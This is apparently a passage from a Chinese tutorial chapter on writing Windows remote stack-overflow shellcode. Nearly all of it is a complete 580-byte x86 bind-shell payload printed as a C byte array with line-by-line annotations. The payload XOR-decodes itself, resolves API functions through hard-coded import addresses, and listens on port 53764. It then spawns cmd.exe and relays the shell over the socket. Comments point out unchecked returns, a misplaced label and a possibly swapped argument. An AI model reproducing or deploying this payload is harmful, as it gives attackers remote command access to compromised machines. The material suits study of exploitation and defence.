Windows系统下的远程堆栈溢出----shellcode编写
应用前面的设计思想,我们可以写出来shellcode如下:
/*
 * sploit: the Windows bind-shell payload built in this chapter, given as raw
 * x86 bytes, one instruction per line.  Reading the annotations below, it is
 * laid out in four parts:
 *   1. a decoder: repnz scasd walks up the stack to the 0xFFFFFFFF marker at
 *      the tail of the payload, then 0xC6 (198) bytes ending there are
 *      XOR-decoded with 0x99 (the encoded string table at the bottom);
 *   2. import resolution: 16 functions (10 from KERNEL32, 6 from WSOCK32) are
 *      looked up with LoadLibrary / GetProcAddress whose import-table slots
 *      sit at HARD-CODED addresses (0x4261E8 / 0x4261E4).  This ties the
 *      payload to the one binary/OS build it was written against; on any
 *      other build those slots hold something else and it simply faults;
 *   3. socket/bind/listen/accept on the port stored in the sockaddr_in at the
 *      bottom, two anonymous pipes, and CreateProcessA("cmd.exe") with its
 *      standard handles redirected to those pipes;
 *   4. a pump loop: PeekNamedPipe/ReadFile -> send, recv -> WriteFile, Sleep.
 * The function table is written with stosd at edi; entry i lives at
 * [edi - 0x40 + 4*i], and every `call [edi-XX]` below is such a slot.
 * No return value in the whole payload is checked.
 */
unsigned char sploit[580] = {
0x90, 0x8b, 0xfc,/* nop ; mov edi, esp */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax */
0xf7, 0xd0,/* not eax ; eax = 0xFFFFFFFF, the end-of-payload marker */
0x50,/* push eax */
0x59,/* pop ecx ; ecx = -1, i.e. no count limit for the scan */
0xf2,/* repnz */
0xaf,/* scasd ; scan up the stack until the 0xFFFFFFFF marker is found */
0x59,/* pop ecx */
0xb1, 0xc6,/* mov cl, C6 ; 198 bytes to decode */
0x8b, 0xc7,/* mov eax, edi ; edi is now just past the marker */
/* Xorshellcode: */
0x48,/* dec eax */
0x80, 0x30, 0x99,/* xor byte ptr [eax], 99 */
0xe2, 0xfa,/* loop Xorshellcode ; walks backwards over the encoded tail */
0x33, 0xf6,/* xor esi, esi */
0x96,/* xchg eax, esi ; esi = first byte of the decoded string table */
0xbb,0x99, 0xe8, 0x61, 0x42, /* mov ebx, 4261E899 ; hard-coded import slot of LoadLibrary, see shr below */
0xc1, 0xeb, 0x08,/* shr ebx, 08 ; ebx = 004261E8 */
0x56,/* push esi ; "KERNEL32" */
0xff, 0x13,/* call dword ptr [ebx] ; LoadLibrary */
0x8b, 0xd0,/* mov edx, eax ; hModule */
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx */
0xb1, 0x0b,/* mov cl, 0B */
0x49,/* dec ecx ; 10 KERNEL32 names to resolve */
/* loadKernelProcess: */
0x32, 0xc0,/* xor al, al */
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadKernelProcess ; advance esi past the NUL of the current name */
0x52,/* push edx */
0x51,/* push ecx */
0x56,/* push esi ; lpProcName */
0x52,/* push edx ; hModule */
0xb3, 0xe4,/* mov bl, e4 ; ebx = 004261E4, hard-coded import slot of GetProcAddress */
0xff, 0x13,/* call dword ptr [ebx] ; GetProcAddress */
0xab,/* stosd ; append to the function table at edi */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadKernelProcess */
/* skip past "ExitProcess\0" so esi points at the next DLL name */
0x32, 0xc0,/* xor al, al */
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne ; back to the lodsb above */
0xb3, 0xe8,/* mov bl, e8 ; LoadLibrary slot again */
0x56,/* push esi ; "WSOCK32" */
0xff, 0x13,/* call dword ptr [ebx] ; LoadLibrary */
0x8b, 0xd0,/* mov edx, eax ; hModule */
0xfc,/* cld */
0x33, 0xc9,/* xor ecx, ecx */
0xb1, 0x06,/* mov cl, 06 ; 6 WSOCK32 names to resolve */
/* loadSocketProcess: */
0x32, 0xc0,/* xor al, al */
0xac,/* lodsb */
0x84, 0xc0,/* test al, al */
0x75, 0xf9,/* jne loadSocketProcess */
0x52,/* push edx */
0x51,/* push ecx */
0x56,/* push esi ; lpProcName */
0x52,/* push edx ; hModule */
0xb3, 0xe4,/* mov bl, e4 ; GetProcAddress slot */
0xff, 0x13,/* call dword ptr [ebx] ; GetProcAddress */
0xab,/* stosd */
0x59,/* pop ecx */
0x5a,/* pop edx */
0xe2, 0xec,/* loop loadSocketProcess */
/*
The code up to here is the preparatory work: it obtains the entry address of
every function the payload needs.  Which functions?  In table order (the list
in the original text omitted CloseHandle, which the string table below does
contain and which is slot 3, called as [edi-34]):
"KERNEL32.dll"
"CreatePipe"
"GetStartupInfoA"
"CreateProcessA"
"CloseHandle"
"PeekNamedPipe"
"GlobalAlloc"
"WriteFile"
"ReadFile"
"Sleep"
"ExitProcess"
"WSOCK32.dll"
"socket"
"bind"
"listen"
"accept"
"send"
"recv"
*/
0x83, 0xc6, 0x05,/* add esi, 00000005 ; skip "recv\0", esi -> sockaddr_in; edi is now esp+4+sizeof(sploit)+function table (16*4) */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; protocol = 0 */
0x40,/* inc eax */
0x50,/* push eax ; type = SOCK_STREAM = 1 */
0x40,/* inc eax */
0x50,/* push eax ; af = AF_INET = 2 */
0xff, 0x57, 0xe8,/* call [edi-18] ; socket(2, 1, 0) */
0x93,/* xchg eax, ebx ; ebx = listening SOCKET */
0x6a, 0x10,/* push 00000010 ; sizeof(sockaddr_in) */
0x56,/* push esi ; &sockaddr_in */
0x53,/* push ebx ; SOCKET */
0xff, 0x57, 0xec,/* call [edi-14] ; bind */
0x6a, 0x02,/* push 00000002 ; backlog = 2 */
0x53,/* push ebx ; SOCKET */
0xff, 0x57, 0xf0,/* call [edi-10] ; listen */
0x33, 0xc0,/* xor eax, eax */
0x57,/* push edi ; save the table pointer */
0x50,/* push eax */
0xb0, 0x0c,/* mov al, 0C ; nLength = sizeof(SECURITY_ATTRIBUTES) */
0xab,/* stosd */
0x58,/* pop eax ; 0 */
0xab,/* stosd ; lpSecurityDescriptor = NULL */
0x40,/* inc eax */
0xab,/* stosd ; bInheritHandle = TRUE ; SECURITY_ATTRIBUTES {12, NULL, TRUE} now sits at edi */
0x5f,/* pop edi ; restore */
0x48,/* dec eax */
0x50,/* push eax ; nSize = 0 */
0x57,/* push edi ; lpPipeAttributes = the SECURITY_ATTRIBUTES just built */
0x56,/* push esi ; out hWritePipe ; esi pointed at the sockaddr, which is no longer needed, so the handles are stored there */
0xad,/* lodsd ; esi += 4 */
0x56,/* push esi ; out hReadPipe */
0xff, 0x57, 0xc0,/* call [edi-40] ; CreatePipe (first pipe: child stdout/stderr) */
0x48,/* dec eax ; BOOL 1 -> 0 */
0x50,/* push eax ; nSize = 0 */
0x57,/* push edi ; lpPipeAttributes */
0xad,/* lodsd */
0x56,/* push esi ; out hWritePipe */
0xad,/* lodsd */
0x56,/* push esi ; out hReadPipe */
0xff, 0x57, 0xc0,/* call [edi-40] ; CreatePipe again (second pipe: child stdin) */
0x48,/* dec eax */
0xb0, 0x44,/* mov al, 44 ; sizeof(STARTUPINFOA) */
0x89, 0x07,/* mov dword ptr [edi], eax ; cb */
0x57,/* push edi */
0xff, 0x57, 0xc4,/* call [edi-3C] ; GetStartupInfoA, filled in at edi */
0x33, 0xc0,/* xor eax, eax */
0x8b, 0x46, 0xf4,/* mov eax, dword ptr [esi-0C] ; first pipe's write handle */
0x89, 0x47, 0x3c,/* mov dword ptr [edi+3C], eax ; hStdOutput = firstWrite */
0x89, 0x47, 0x40,/* mov dword ptr [edi+40], eax ; hStdError = firstWrite */
0x8b, 0x06,/* mov eax, dword ptr [esi] ; second pipe's read handle */
0x89, 0x47, 0x38,/* mov dword ptr [edi+38], eax ; hStdInput = secondRead */
0x33, 0xc0,/* xor eax, eax */
0x66, 0xb8, 0x01, 0x01,/* mov ax, 0101 */
0x89, 0x47, 0x2c,/* mov dword ptr [edi+2C], eax ; dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES */
0x57,/* push edi ; lpProcessInformation (shares the scratch area with STARTUPINFO) */
0x57,/* push edi ; lpStartupInfo */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; lpCurrentDirectory = NULL */
0x50,/* push eax ; lpEnvironment = NULL */
0x50,/* push eax ; dwCreationFlags = 0 */
0x40,/* inc eax */
0x50,/* push eax ; bInheritHandles = TRUE */
0x48,/* dec eax */
0x50,/* push eax ; lpThreadAttributes = NULL */
0x50,/* push eax ; lpProcessAttributes = NULL */
0xad,/* lodsd ; esi += 4, now just past the 16-byte sockaddr */
0x56,/* push esi ; lpCommandLine = "cmd.exe" */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; lpApplicationName = NULL */
0xff, 0x57, 0xc8,/* call [edi-38] ; CreateProcessA ; eax = 1 ok, 0 error (not checked) */
0xff, 0x76, 0xf0,/* push [esi-10] ; first pipe's write handle (child-side end) */
0xff, 0x57, 0xcc,/* call [edi-34] ; slot 3 = CloseHandle */
0xff, 0x76, 0xfc,/* push [esi-04] ; second pipe's read handle (child-side end) */
0xff, 0x57, 0xcc,/* call [edi-34] ; CloseHandle */
0x48,/* dec eax ; BOOL 1 -> 0 */
0x50,/* push eax ; addrlen = NULL */
0x50,/* push eax ; addr = NULL */
0x53,/* push ebx ; listening SOCKET */
0xff, 0x57, 0xf4,/* call [edi-0C] ; accept ; eax = client SOCKET */
0x8b, 0xd8,/* mov ebx, eax ; ebx = client SOCKET from here on */
0x33, 0xc0,/* xor eax, eax */
0xb4, 0x04,/* mov ah, 04 ; eax = 0x400 = 1024 */
0x50,/* push eax ; dwBytes = 1024 */
0xc1, 0xe8, 0x04,/* shr eax, 04 ; eax = 0x40 */
0x50,/* push eax ; uFlags = 0x40 = GMEM_FIXED | GMEM_ZEROINIT */
0xff, 0x57, 0xd4,/* call [edi-2C] ; GlobalAlloc(0x40, 1024) */
0x8b, 0xf0,/* mov esi, eax ; esi = I/O buffer */
/* PeekPipe: */
0x33, 0xc0,/* xor eax, eax */
0x8b, 0xc8,/* mov ecx, eax */
0xb5, 0x04,/* mov ch, 04 ; ecx = 1024 */
0x50,/* push eax ; lpBytesLeftThisMessage = NULL */
0x50,/* push eax ; lpTotalBytesAvail = NULL */
0x57,/* push edi ; lpBytesRead */
0x51,/* push ecx ; nBufferSize = 1024 */
0x56,/* push esi ; lpBuffer */
0xff, 0x77, 0xa8,/* push [edi-58] ; first pipe's read handle */
0xff, 0x57, 0xd0,/* call [edi-30] ; PeekNamedPipe */
0x83, 0x3f, 0x01,/* cmp dword ptr [edi], 00000001 ; [edi] = bytes available */
0x7c, 0x22,/* jl GetUserInput ; nothing from the child, check the client instead */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; lpOverlapped = NULL */
0x57,/* push edi ; lpNumberOfBytesRead */
0xff, 0x37,/* push dword ptr [edi] ; nNumberOfBytesToRead */
0x56,/* push esi ; lpBuffer */
0xff, 0x77, 0xa8,/* push [edi-58] ; first pipe's read handle */
0xff, 0x57, 0xdc,/* call [edi-24] ; ReadFile */
0x0b, 0xc0,/* or eax, eax */
0x74, 0x2f,/* je GameOver ; ReadFile returned FALSE */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; flags = 0 */
0xff, 0x37,/* push dword ptr [edi] ; len = bytes read */
0x56,/* push esi ; buf */
0x53,/* push ebx ; client SOCKET */
0xff, 0x57, 0xf8,/* call [edi-08] ; send */
0x6a, 0x50,/* push 00000050 ; 80 ms */
0xff, 0x57, 0xe0,/* call [edi-20] ; slot 8 = Sleep */
0xeb, 0xc8,/* jmp PeekPipe */
/* GetUserInput: */
0x33, 0xc0,/* xor eax, eax */
0x50,/* push eax ; flags = 0 */
0xb4, 0x04,/* mov ah, 04 ; eax = 1024 */
0x50,/* push eax ; len = 1024 */
0x56,/* push esi ; buf */
0x53,/* push ebx ; client SOCKET */
0xff, 0x57, 0xfc,/* call [edi-04] ; recv ; eax = bytes received (SOCKET_ERROR is not checked) */
0x57,/* push edi ; lpOverlapped, as originally annotated ; NOTE(review): this and the NULL below look swapped against WriteFile's parameter order -- unverified */
0x33, 0xc9,/* xor ecx, ecx */
0x51,/* push ecx ; lpNumberOfBytesWritten = NULL */
0x50,/* push eax ; nNumberOfBytesToWrite */
0x56,/* push esi ; buf */
0xff, 0x77, 0xac,/* push [edi-54] ; second pipe's write handle */
0xff, 0x57, 0xd8,/* call [edi-28] ; WriteFile (client input -> child's stdin) */
0x6a, 0x50,/* push 00000050 ; 80 ms */
0xff, 0x57, 0xe0,/* call [edi-20] ; Sleep */
/* the original text put the GameOver label here, but the je above (+0x2F) lands on the push eax after this jmp */
0xeb, 0xaa,/* jmp PeekPipe */
/* GameOver: */
0x50,/* push eax ; uExitCode */
0xff, 0x57, 0xe4,/* call [edi-1C] ; ExitProcess */
0x90,/* nop */
/*
This long stretch is the C-language algorithm given earlier; the comments are
detailed, so nothing more to add.
*/
/*
 * String table, XOR-encoded with 0x99 so that no NUL byte appears in the
 * payload.  Decoded, it holds in order: "KERNEL32", "CreatePipe",
 * "GetStartupInfoA", "CreateProcessA", "CloseHandle", "PeekNamedPipe",
 * "GlobalAlloc", "WriteFile", "ReadFile", "Sleep", "ExitProcess", "WSOCK32",
 * "socket", "bind", "listen", "accept", "send", "recv" (each NUL-terminated),
 * then a 16-byte sockaddr_in (sin_family = 2, sin_port, INADDR_ANY and
 * zero padding), "cmd.exe\0", the 0xFFFFFFFF marker that repnz scasd
 * searches for, and a trailing CR LF.
 */
0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99, /* ... "recv\0", then sin_family = 2 */
0x4b, 0x9d, /* sin_port: 0x4b9d XOR 0x9999 = 0xd204 = port 53764 (network byte order) */
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, /* sin_addr = INADDR_ANY + 8 bytes of padding */
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff, /* "cmd.exe\0", then the 0xFFFFFFFF marker */
0x0d, 0x0a};
/*
这些就是那个字符串表,已经经过了编码。
*/